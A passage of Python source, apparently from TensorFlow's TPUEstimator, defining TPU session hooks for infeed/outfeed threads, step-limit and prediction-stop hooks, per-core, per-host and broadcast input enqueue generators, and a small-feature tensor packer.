for hook in training_hooks + evaluation_hooks + prediction_hooks:
if not isinstance(hook, session_run_hook.SessionRunHook):
raise TypeError('All hooks must be SessionRunHook instances, given: {}'
.format(hook))
return super(TPUEstimatorSpec, cls).__new__(
cls,
mode=mode,
predictions=predictions,
loss=loss,
train_op=train_op,
eval_metrics=eval_metrics,
export_outputs=export_outputs,
scaffold_fn=scaffold_fn,
host_call=host_call,
training_hooks=training_hooks,
evaluation_hooks=evaluation_hooks,
prediction_hooks=prediction_hooks)
def as_estimator_spec(self):
"""Creates an equivalent `EstimatorSpec` used by CPU train/eval."""
host_calls = {}
if self.eval_metrics is not None:
host_calls['eval_metrics'] = self.eval_metrics
if self.host_call is not None:
host_calls['host_call'] = self.host_call
host_call_ret = _OutfeedHostCall.create_cpu_hostcall(host_calls)
eval_metric_ops = None
if self.eval_metrics is not None:
eval_metric_ops = host_call_ret['eval_metrics']
hooks = None
if self.host_call is not None:
hooks = [_OutfeedHostCallHook(host_call_ret['host_call'])]
loss = self.loss
if tensor_tracer.TensorTracer.is_enabled() \
and self.train_op is not None:
tt = tensor_tracer.TensorTracer()
loss = tt.trace_cpu(ops.get_default_graph(), loss, self.train_op)
hooks = tuple(hooks or [])
scaffold = self.scaffold_fn() if self.scaffold_fn else None
return model_fn_lib.EstimatorSpec(
mode=self.mode,
predictions=self.predictions,
loss=loss,
train_op=self.train_op,
eval_metric_ops=eval_metric_ops,
export_outputs=self.export_outputs,
scaffold=scaffold,
training_hooks=self.training_hooks + hooks,
evaluation_hooks=self.evaluation_hooks + hooks,
prediction_hooks=self.prediction_hooks + hooks)
class _OpQueueContext(object):
"""Manages work queue and thread for a infeed/outfeed thread."""
def __init__(self, name, target, args):
self._name = name
self._queue = Queue.Queue()
args = (self,) + args
self._thread = threading.Thread(name=name, target=target, args=args)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._queue.put(_SIGNAL.STOP)
def send_next_batch_signal(self, iterations):
self._queue.put(iterations)
def read_iteration_counts(self):
while True:
iterations = self._queue.get(block=True)
logging.debug('%s read iterations %s', self._name, iterations)
if iterations == _SIGNAL.STOP:
logging.info('%s received shutdown signal, stopping.', self._name)
return
yield iterations
def join(self):
logging.info('Shutting down %s thread.', self._name)
self.stop()
self._thread.join()
class _OpSignalOnceQueueContext(_OpQueueContext):
"""Manages work queue and thread for a infeed/outfeed thread.
This subclass only signals once.
"""
def __init__(self, name, target, args):
super(_OpSignalOnceQueueContext, self).__init__(name, target, args)
self._has_signaled = False
def send_next_batch_signal(self, iterations):
if not self._has_signaled:
self._queue.put(iterations)
self._has_signaled = True
class TPUInfeedOutfeedSessionHook(session_run_hook.SessionRunHook):
"""A Session hook setting up the TPU initialization, infeed, and outfeed.
This hook does two major things:
1. initialize and shutdown TPU system.
2. launch and join the threads for infeed enqueue and (optional) outfeed
dequeue.
"""
def __init__(self,
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op,
run_infeed_loop_on_coordinator=True,
rendezvous=None,
master=None,
session_config=None,
tpu_init_ops=None,
outfeed_every_n_steps=1):
self._master_job = ctx.master_job
self._enqueue_ops = enqueue_ops
self._dequeue_ops = dequeue_ops
self._rendezvous = rendezvous
self._master = master
self._session_config = session_config
self._init_ops = list(tpu_init_ops or [])
if ctx.embedding_config is None:
self._embedding_layer_config = None
else:
self._embedding_layer_config = (
ctx.embedding_config.tpu_embedding.config_proto)
self._run_infeed_loop_on_coordinator = run_infeed_loop_on_coordinator
self._initial_infeed_sleep_secs = (
ctx.config.tpu_config.initial_infeed_sleep_secs)
self._tpu_compile_op = tpu_compile_op
# When using model parallelism, the TPU is pre-initialized at startup to
# fetch mesh information. We skip re-initializing it here for
# MeshTensorFlow since it places variables on TPU directly. Reinitialize tpu
# is causing the variable corruption since the previous allocated memory
# might be overwritten for other purpose.
if (ctx.model_parallelism_enabled and
(ctx.config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.BROADCAST)):
self._should_initialize_tpu = False
else:
self._should_initialize_tpu = True
self._outfeed_every_n_steps = outfeed_every_n_steps
def begin(self):
logging.info('TPU job name %s', self._master_job)
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
if self._should_initialize_tpu:
self._finalize_ops = [tpu.shutdown_system(job=self._master_job)]
else:
self._finalize_ops = []
summary_writer_init_ops = contrib_summary.summary_writer_initializer_op()
self._init_ops.extend(summary_writer_init_ops)
# Get all the writer resources from the initializer, so we know what to
# flush.
for op in summary_writer_init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def _run_infeed(self, queue_ctx, session):
logging.info('Starting infeed thread controller.')
if self._initial_infeed_sleep_secs:
logging.info('Infeed thread sleeping for %d seconds.',
self._initial_infeed_sleep_secs)
time.sleep(self._initial_infeed_sleep_secs)
logging.info('Infeed thread starting after sleep')
with self._rendezvous.catch_errors(source='infeed', session=session):
if self._run_infeed_loop_on_coordinator:
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug('Infeed enqueue for iteration (%d, %d)', count, i)
session.run(self._enqueue_ops)
else:
for _ in queue_ctx.read_iteration_counts():
session.run(self._enqueue_ops)
logging.info('Infeed thread finished, shutting down.')
def _run_outfeed(self, queue_ctx, session):
logging.info('Starting outfeed thread controller.')
status_logger = PeriodicLogger(seconds=60)
with self._rendezvous.catch_errors(source='outfeed', session=session):
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
step_counter = 0
for i in xrange(steps):
logging.debug('Outfeed dequeue for iteration (%d, %d)', count, i)
if step_counter % self._outfeed_every_n_steps == 0:
session.run(self._dequeue_ops)
step_counter += 1
status_logger.log('Outfeed finished for iteration (%d, %d)', count, i)
logging.info('Outfeed thread finished, shutting down.')
def _create_infeed_controller(self, name, target, args):
return _OpQueueContext(name=name, target=target, args=args)
def _assertCompilationSucceeded(self, result, coord):
proto = tpu_compilation_result.CompilationResultProto()
proto.ParseFromString(result)
if proto.status_error_message:
logging.error('Compilation failed: {}'.format(proto.status_error_message))
coord.request_stop()
else:
logging.info('Compilation succeeded')
def after_create_session(self, session, coord):
if self._should_initialize_tpu:
logging.info('Init TPU system')
start = time.time()
with ops.Graph().as_default():
with tf_session.Session(
self._master, config=self._session_config) as sess:
sess.run(
tpu.initialize_system(
job=self._master_job,
embedding_config=self._embedding_layer_config))
logging.info('Initialized TPU in %d seconds', time.time() - start)
session.run(self._init_ops,
options=config_pb2.RunOptions(timeout_in_ms=5 * 60 * 1000))
if os.environ.get('TPU_SPLIT_COMPILE_AND_EXECUTE', '') == '1':
logging.info('Compiling user program: this may take a while...')
self._assertCompilationSucceeded(session.run(self._tpu_compile_op), coord)
self._infeed_controller = self._create_infeed_controller(
name='InfeedController', target=self._run_infeed, args=(session,))
self._outfeed_controller = _OpQueueContext(
name='OutfeedController', target=self._run_outfeed, args=(session,))
# Enable the worker watchdog to terminate workers on coordinator exit.
watchdog_timeout = int(os.environ.get('TF_TPU_WATCHDOG_TIMEOUT', '0'))
if watchdog_timeout > 0:
session_support.start_worker_watchdog(session,
shutdown_timeout=watchdog_timeout)
def before_run(self, run_context):
iterations = run_context.session.run(self._iterations_per_loop_var)
logging.info('Enqueue next (%d) batch(es) of data to infeed.', iterations)
self._infeed_controller.send_next_batch_signal(iterations)
logging.info('Dequeue next (%d) batch(es) of data from outfeed.',
iterations)
self._outfeed_controller.send_next_batch_signal(iterations)
def end(self, session):
logging.info('Stop infeed thread controller')
self._infeed_controller.join()
self._rendezvous.record_done('infeed')
logging.info('Stop output thread controller')
self._outfeed_controller.join()
self._rendezvous.record_done('outfeed')
logging.info('Shutdown TPU system.')
session.run(self._finalize_ops)
class TPUInfeedOutfeedSessionHookForPrediction(TPUInfeedOutfeedSessionHook):
def __init__(self, ctx, enqueue_ops, dequeue_ops, tpu_compile_op,
rendezvous=None, master=None, session_config=None):
super(TPUInfeedOutfeedSessionHookForPrediction, self).__init__(
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op=tpu_compile_op,
run_infeed_loop_on_coordinator=False,
rendezvous=rendezvous,
master=master,
session_config=session_config)
def _create_infeed_controller(self, name, target, args):
return _OpSignalOnceQueueContext(name=name, target=target, args=args)
class _TPUStopAtStepHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step.
This hook is similar to the `session_run_hook._StopAfterNEvalsHook` with
following differences for TPU training:
1. This hook sets the variable for `iterations_per_loop`, which is used by
`TPUInfeedOutfeedSessionHook` to control the iterations for infeed/outfeed.
If the `iterations_per_loop` value is specified as time in seconds, the
number of iterations per `Session.run` will be estimated automatically
based on per iteration runtime.
As the hook execution order is not guaranteed, the variable update is
handled in `after_create_session` and `after_run` as
`TPUInfeedOutfeedSessionHook` reads the variable value in `before_run`.
2. For each training loop (session.run), the global step could be increased
multiple times on TPU. The global step tensor value will be explicitly read
again in `after_run` to ensure the latest value is retrieved to avoid race
condition.
"""
def __init__(self,
iterations_per_loop_counter,
num_steps=None,
final_step=None):
"""Initializes a `TPUStopAtStepHook`.
Args:
iterations_per_loop_counter: A namedtuple of [`value',`unit`] that
represents the number of 'iterations count' or 'time in seconds' to run
optimizer per loop, based on the `unit` specified, `count` or `seconds`
respectively.
num_steps: Number of steps to execute.
final_step: Step after which to stop.
Raises:
ValueError: If one of the arguments is invalid.
"""
if num_steps is None and final_step is None:
raise ValueError('One of `num_steps` or `final_step` must be specified.')
if num_steps is not None and final_step is not None:
raise ValueError(
'Only one of `num_steps` or `final_step` can be specified.')
self._iterations_per_loop_counter = iterations_per_loop_counter
if self._iterations_per_loop_counter.unit not in ['seconds', 'count']:
raise ValueError(
'Only `count` or `seconds` are accepted as the '
'`iterations_per_loop_counter.unit')
self._num_steps = num_steps
self._final_step = final_step
self._next_iteration_count = 1
self._iteration_count_estimator = None
if self._iterations_per_loop_counter.unit == 'seconds':
self._iteration_count_estimator = (
iteration_count_estimator.IterationCountEstimator())
self._start_time = time.time()
def _next_iterations(self, global_step, final_step):
"""Computes the next iterations count.
The next iterations count is computed by choosing the smaller of the
remaining step count (`final_step` - `global_step`) and the estimated
iterations count returned by the estimator.
Args:
global_step: The current step.
final_step: Step after which to stop.
Returns:
The number of iterations count to run per loop.
"""
remaining_steps = final_step - global_step
if self._iteration_count_estimator is not None:
estimated_iterations = self._iteration_count_estimator.get(
self._iterations_per_loop_counter.value)
else:
estimated_iterations = self._iterations_per_loop_counter.value
self._next_iteration_count = min(remaining_steps, estimated_iterations)
return self._next_iteration_count
def begin(self):
"""Initializes variables.
Initializes the global step and iterations per loop variables.
Raises:
RuntimeError: An error occurred if global step variable does not exist.
"""
self._global_step_tensor = training_util.get_global_step()
if self._global_step_tensor is None:
raise RuntimeError('Global step should be created.')
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
"""Computes and updates the first time iterations count.
The iterations are computed by choosing the smaller of the (`final step` -
`global step`), and the initial estimated iterations returned by the
estimator (by default is 1).
Args:
session: A TensorFlow Session that has been created.
coord: A Coordinator object which keeps track of all threads.
"""
global_step = session.run(self._global_step_tensor)
if self._final_step is None:
self._final_step = global_step + self._num_steps
iterations = self._next_iterations(global_step, self._final_step)
self._iterations_per_loop_var.load(iterations, session=session)
def before_run(self, run_context):
"""Reset the timer."""
if self._iteration_count_estimator is not None:
self._start_time = time.time()
def after_run(self, run_context, run_values):
"""Computes the next iterations per loop value or terminates.
Computes the elapsed time to run the last optimizer loop and if the
`IterationCountEstimator` is used, records the elapsed time and iterations
count. If the final step count has been reached, terminates. Otherwise,
computes and updates the number of iterations to run the optimizer per loop.
Args:
run_context: A `SessionRunContext` object.
run_values: A SessionRunValues object.
"""
if self._iteration_count_estimator is not None:
elapsed_time = time.time() - self._start_time
logging.info("ElapsedTime: %.3f", elapsed_time)
self._iteration_count_estimator.update(elapsed_time,
self._next_iteration_count)
# Global step cannot be retrieved via SessionRunArgs and before_run due to
# race condition.
global_step = run_context.session.run(self._global_step_tensor)
if global_step >= self._final_step:
run_context.request_stop()
else:
iterations = self._next_iterations(global_step, self._final_step)
self._iterations_per_loop_var.load(
iterations, session=run_context.session)
class _SetEvalIterationsHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step."""
def __init__(self, num_steps):
"""Initializes a `_SetEvalIterationsHook`.
Args:
num_steps: Number of steps to execute.
"""
self._num_steps = num_steps
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
self._iterations_per_loop_var.load(self._num_steps, session=session)
class _StoppingPredictHook(session_run_hook.SessionRunHook):
"""Hook that requests stop according to the stopping signal in prediction."""
def __init__(self, scalar_stopping_signal):
self._scalar_stopping_signal = scalar_stopping_signal
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
# This is not necessary as we do not run infeed enqueue and outfeed dequeue
# in side threads for prediction model. But it makes the
# TPUInfeedOutfeedSessionHook prints nice message.
self._iterations_per_loop_var.load(1, session=session)
def before_run(self, run_context):
return session_run_hook.SessionRunArgs(self._scalar_stopping_signal)
def after_run(self, run_context, run_values):
_ = run_context
scalar_stopping_signal = run_values.results
if _StopSignals.should_stop(scalar_stopping_signal):
# NOTE(xiejw): In prediction, stopping signals are inserted for each
# batch. And we append one more batch to signal the system it should stop.
# The data flow might look like
#
# batch 0: images, labels, stop = 0 (user provided)
# batch 1: images, labels, stop = 0 (user provided)
# ...
# batch 99: images, labels, stop = 0 (user provided)
# batch 100: images, labels, stop = 1 (TPUEstimator appended)
#
# where the final batch (id = 100) is appended by TPUEstimator, so we
# should drop it before returning the predictions to user.
# To achieve that, we throw the OutOfRangeError in after_run. Once
# Monitored Session sees this error in SessionRunHook.after_run, the
# "current" prediction, i.e., batch with id=100, will be discarded
# immediately
raise errors.OutOfRangeError(None, None, 'Stopped by stopping signal.')
def generate_per_core_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, host_device, host_id):
"""Generates infeed enqueue ops for per-core input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A fn returns enqueue_ops."""
num_cores_per_host = ctx.num_of_cores_per_host
per_host_sharded_inputs = []
for core_ordinal in range(num_cores_per_host):
with ops.name_scope('ordinal_%d' % (core_ordinal)):
user_context = tpu_context.TPUContext(
internal_ctx=ctx,
input_device=host_device,
invocation_index=host_id * ctx.num_of_cores_per_host + core_ordinal)
inputs = _Inputs.from_input_fn(input_fn(user_context))
if inputs.is_dataset:
raise TypeError(
'`input_fn` returning `Dataset` is not yet supported in '
'per-Core input pipeline deployment yet. Please set '
'TPUConfig.per_host_input_for_training to True or return '
'`features` and `labels` from `input_fn`')
features, labels = inputs.features_and_labels()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels))
per_host_sharded_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs, tpu_ordinal_function=tpu_ordinal_function_impl)
return per_host_enqueue_ops
return enqueue_ops_fn, captured_infeed_queue
def generate_per_host_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, batch_axis, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with ops.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device, invocation_index=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
if batch_axis is not None:
raise TypeError('For mode PREDICT, batch_axis is not supported yet.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A Fn returning the TPU infeed enqueue ops.
By providing as a Fn, it can be invoked inside the tf.while_loop such that
the input pipeline for multiple iterations can be executed by one
Session.run call.
Returns:
list of dict of ops.
"""
with ops.device(device):
num_of_replicas_per_host = ctx.num_of_replicas_per_host
# Convert user input to features and labels. If the user returns a
# dataset, it is initialized and the features and labels extracted via
# `dataset.iterator.get_next()`
features, labels = inputs.features_and_labels()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(features, labels)
unsharded_tensor_list = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
infeed_queue = tpu_feed.InfeedQueue(
tuple_types=[t.dtype for t in unsharded_tensor_list],
tuple_shapes=[t.shape for t in unsharded_tensor_list],
shard_dimensions=batch_axis)
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_number_of_shards(num_of_replicas_per_host)
per_host_enqueue_ops = (
infeed_queue.split_inputs_and_generate_enqueue_ops(
unsharded_tensor_list,
placement_function=lambda x: device,
tpu_ordinal_function=tpu_ordinal_function_impl))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_per_host_v2_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with ops.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device, invocation_index=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if not is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for the PER_HOST_V2 '
'input pipeline configuration.')
# Be aware that when num_cores_per_replica > num_cores_per_host,
# ctx.num_of_replicas_per_host is 0.
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True,
num_invocations_per_step=max(1, ctx.num_of_replicas_per_host))
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def device_function_impl(shard_id):
if ctx.device_assignment is not None:
# Find the replica_id of the host's logical core 0.
# The current host_id is guaranteed to contain the logical core 0,
# even when num_cores_per_replica > num_cores_per_host -- the function
# caller makes sure that this host_id will must be receiving data (calls
# input_fn).
replica_id = ctx.device_assignment.lookup_replicas(
task_id=host_id, logical_core=0)[shard_id]
return ctx.tpu_host_placement_function(replica_id=replica_id)
else:
return None
def enqueue_ops_fn():
"""Generates the per_host enqueue ops."""
control_deps = []
per_host_sharded_inputs = []
enqueue_datas_list = []
# Be aware that when num_cores_per_replica > num_cores_per_host,
# ctx.num_of_replicas_per_host is 0.
num_replicas_per_host = max(1, ctx.num_of_replicas_per_host)
cached_signals = None
with ops.device(device):
if not inputs.is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for this mode.')
for _ in range(num_replicas_per_host):
# Use control dependencies to ensure a deterministic ordering.
with ops.control_dependencies(control_deps):
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
# All the replicas share the replica 0's stopping signal.
# This avoids inconsistent state among different model replcias.
if cached_signals:
signals['stopping'] = cached_signals['stopping']
else:
cached_signals = signals
features, labels, enqueue_data = (
_tpu_estimator_embedding.split_inputs(ctx, features, labels))
enqueue_datas_list.append(enqueue_data)
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
control_deps.extend(flattened_inputs)
per_host_sharded_inputs.append(flattened_inputs)
if inputs_structure_recorder.flattened_input_dims:
input_partition_dims = inputs_structure_recorder.flattened_input_dims
if signals:
input_partition_dims += [None] * len(signals)
# pylint: disable=protected-access
infeed_queue = tpu_feed._PartitionedInfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]),
host_id=host_id,
input_partition_dims=input_partition_dims,
device_assignment=ctx.device_assignment)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs)
else:
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl,
placement_function=device_function_impl)
captured_infeed_queue.capture(infeed_queue)
if ctx.embedding_config:
per_host_enqueue_ops.extend(
ctx.embedding_config.tpu_embedding.generate_enqueue_ops(
enqueue_datas_list))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_broadcast_enqueue_ops_fn(ctx, input_fn, inputs_structure_recorder,
num_hosts):
"""Generates infeed enqueue ops for one input_fn on all the hosts."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
device_0 = ctx.tpu_host_placement_function(host_id=0)
with ops.device(device_0):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device_0, invocation_index=0)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
num_replicas_per_host = ctx.num_of_replicas_per_host
def tpu_ordinal_function_impl(shard_id):
if ctx.device_assignment:
return ctx.device_assignment.tpu_ordinal(replica=shard_id)
else:
return shard_id % num_replicas_per_host
def device_function_impl(shard_id):
# shard_id ranges from 0 to num_of_replicas_per_host - 1.
# A shard is a replica inside a host.
# In broadcast mode (generate_broadcast_enqueue_ops_fn), the enqueue ops
# are always executed on the first host. Thus shard_id equals to replica_id.
return ctx.tpu_host_placement_function(replica_id=shard_id)
def enqueue_ops_fn():
"""Generates enqueue ops for all the hosts."""
broadcasted_inputs = []
flattened_inputs = None # Cache result from input_fn.
signals = None
num_replicas = ctx.num_replicas
core_id = 0
for host_id in xrange(num_hosts):
with ops.device(ctx.tpu_host_placement_function(host_id=host_id)):
for _ in xrange(ctx.num_of_replicas_per_host):
# Note: input_fn is only called once at host 0 for the first replica.
# The features and labels returned from that invocation are
# broadcasted to other replicas(including the replicas on other
# hosts).
if flattened_inputs is None:
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
if (ctx.config.tpu_config.eval_training_input_configuration is
tpu_config.InputPipelineConfig.SLICED):
input_slices = [
array_ops.split(x, num_replicas) for x in flattened_inputs
]
if (ctx.config.tpu_config.eval_training_input_configuration is
tpu_config.InputPipelineConfig.SLICED):
# for each core, slice out the flattened_inputs for each core.
broadcasted_inputs.append([x[core_id] for x in input_slices])
core_id += 1
else:
broadcasted_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(broadcasted_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
enqueue_ops = infeed_queue.generate_enqueue_ops(
broadcasted_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl,
placement_function=device_function_impl)
if signals is None:
return enqueue_ops
else:
return {
'ops': enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
class TensorPacker(object):
"""Pack and unpack small tensors into a big one for efficiency."""
def __init__(self, small_feature_dim_size,
minimum_num_small_features_to_group):
self._small_feature_dim_size = small_feature_dim_size
self._minimum_num_small_features_to_group = (
minimum_num_small_features_to_group)
def maybe_concatenate_features(self, features):
"""If there are enough small tensors, concat them for performance."""
self._small_feature_names = {}
self._small_feature_sizes = {}
feature_names = _extract_key_names(features)
if feature_names: # Not a single tensor.
# First pass: see if it is worth concatenating the small features.
for name in feature_names:
tensor = features[name]
# We do not handle nested inputs here.
if not isinstance(tensor, ops.Tensor):
return
shape = tensor.get_shape().as_list()
dtype = tensor.dtype
if (len(shape) == 2 and
shape[1] <= self._small_feature_dim_size):
logging.info('Found small feature: %s %s', name, shape)
if tensor.dtype not in self._small_feature_names:
self._small_feature_names[dtype] = []
self._small_feature_sizes[dtype] = []
self._small_feature_names[dtype].append(name)
self._small_feature_sizes[dtype].append(shape[1])
dtypes_ = list(self._small_feature_names.keys())
for dtype in dtypes_:
# If we could find 5 (or more) [batch_size, 1] dense features,
# we will group them.
if (len(self._small_feature_names[dtype]) <
self._minimum_num_small_features_to_group):
self._small_feature_names.pop(dtype) # reset
self._small_feature_sizes.pop(dtype) # reset
# Second pass: separate small features out
small_feature_tensors = {}
for dtype in self._small_feature_names:
small_feature_tensors[dtype] = []
for name in self._small_feature_names[dtype]:
small_feature_tensors[dtype].append(features.pop(name))
# Add the concat Tensor to features with a special key.
for dtype in self._small_feature_names:
key = self._get_small_feature_key(dtype)
if key in features:
raise ValueError('{} is reserved as feature key for concatenated'
'small features.')
features[key] = (array_ops.concat(small_feature_tensors[dtype], axis=1))
def maybe_split_features(self, maybe_concatenated_features):
for dtype in self._small_feature_names:
key = self._get_small_feature_key(dtype)
concatenated_small_features = maybe_concatenated_features.pop(key)
splits = array_ops.split(
concatenated_small_features, self._small_feature_sizes[dtype], axis=1)
for name, split in zip(self._small_feature_names[dtype], splits):
maybe_concatenated_features[name] = split
def _get_small_feature_key(self, dtype):
return _TENSOR_PACKER_CONCATENATED_SMALL_FEATURES_KEY + '_' + str(dtype)
class _InputPipeline(object):
"""`_InputPipeline` handles invoking `input_fn` and piping to infeed queue.
`_InputPipeline` abstracts the per-core/per-host `input_fn` invocation from
call site. To be precise, based on the configuration in
`_InternalTPUContext`, it invokes `input_fn` for all cores (usually
multi-host TPU training) or for one host (usually for single-host TPU
evaluation), and sends all `features` and `labels` returned by `input_fn` to
TPU infeed. For per-core invocation, `features` and `labels` are piped to
infeed directly, one tuple for each core. For per-host invocation, `features`
and `labels` are split at host (with respect to `batch_axis`) and piped to all
cores accordingly.
In addition, flatten/unflatten are handled by `_InputPipeline` also. Model
inputs returned by the `input_fn` can have one of the following forms:
1. features
2. (features, labels)
3. ((arbitrarily nested structure of features), labels)
Internally, form 1 is reformed to `(features, None)` as features and labels
are passed separately to underlying methods. For TPU training, TPUEstimator
may expect multiple `features` and `labels` tuples one for each core.
TPUEstimator allows various different structures for inputs (namely `features`
and `labels`). Both `features` and `labels` can be any nested sturcture
supported by TF nest (namely, dict, tuples, namedtuples or any nested
structure of such of Tensors). `labels` could be `None` as well.
These are flattened before they are passed to the infeed/outfeed library
as that expectes flattend lists.
"""
class InputsStructureRecorder(object):
"""The recorder to record inputs structure."""
def __init__(self, input_partition_dims=None):
# Holds the structure of inputs
self._feature_structure = {}
self._flattened_input_dims = None
if input_partition_dims:
# This should have been validated in TPUConfig.
assert len(input_partition_dims) <= 2, 'must have 1 or 2 elements.'
if len(input_partition_dims) == 2:
self._feature_dims, self._label_dims = input_partition_dims
else:
self._feature_dims = input_partition_dims[0]
self._label_dims = None
assert self._feature_dims is not None, ('input_partition_dims[0] must '
'not be None')
else:
self._feature_dims = None
self._label_dims = None
# Internal state.
self._initialized = False
@property
def flattened_input_dims(self):
assert self._initialized, 'InputsStructureRecorder is not initialized.'
return self._flattened_input_dims
def has_labels(self):
return 'labels' in self._feature_structure
def _flatten_input_dims(self, features, labels, feature_dims, label_dims):
"""Flatten input dims with the same order as flattened input tensors."""
try:
flattened_input_dims = data_nest.flatten_up_to(features, feature_dims)
except TypeError as e:
raise ValueError(
'TPUConfig.input_partition_dims[0] mismatched the structure of'
' features. input_partition_dims[0]: {}, features {}. {}'.format(
feature_dims, features, e))
if labels is not None:
if label_dims is not None:
try:
flattened_input_dims.extend(
data_nest.flatten_up_to(labels, self._label_dims))
except TypeError as e:
raise ValueError(
'TPUConfig.input_partition_dims[1] mismatched the structure of'
' labels. input_partition_dims[1]: {}, labels: {}. {}'.format(
label_dims, labels, e))
else:
num_label_tensors = len(data_nest.flatten(labels))
flattened_input_dims.extend([None] * num_label_tensors)
return flattened_input_dims
def validate_and_record_structure(self, features, labels):
"""Validates and records the structure of `features` and `labels`."""
# Extract structure.
feature_names = _extract_key_names(features)
label_names = _extract_key_names(labels)
if not self._initialized:
# Record structure.
self._initialized = True
if self._feature_dims is not None:
feature_dims_names = _extract_key_names(self._feature_dims)
if feature_dims_names != feature_names:
raise ValueError(
'TPUConfig.input_partition_dims[0] mismatched feature'
' keys. Expected {}, got {}'.format(feature_names,
feature_dims_names))
label_dims_names = _extract_key_names(self._label_dims)
if self._label_dims is not None and label_dims_names != label_names:
raise ValueError(
'TPUConfig.input_partition_dims[1] mismatched label'
' keys. Expected {}, got {}'.format(label_names,
label_dims_names))
self._flattened_input_dims = self._flatten_input_dims(
features, labels, self._feature_dims, self._label_dims)
def flatten_features_and_labels(self, features, labels, signals=None):
"""Flattens the `features` and `labels` to a single tensor list."""
self.tensor_packer = TensorPacker(
_TENSOR_PACKER_SMALL_FEATURE_DIM_SIZE,
_TENSOR_PACKER_MINIMUM_NUM_SMALL_FEATURES_TO_GROUP)
self.tensor_packer.maybe_concatenate_features(features)
self._feature_structure['features'] = features
if labels is not None:
self._feature_structure['labels'] = labels
if signals is not None:
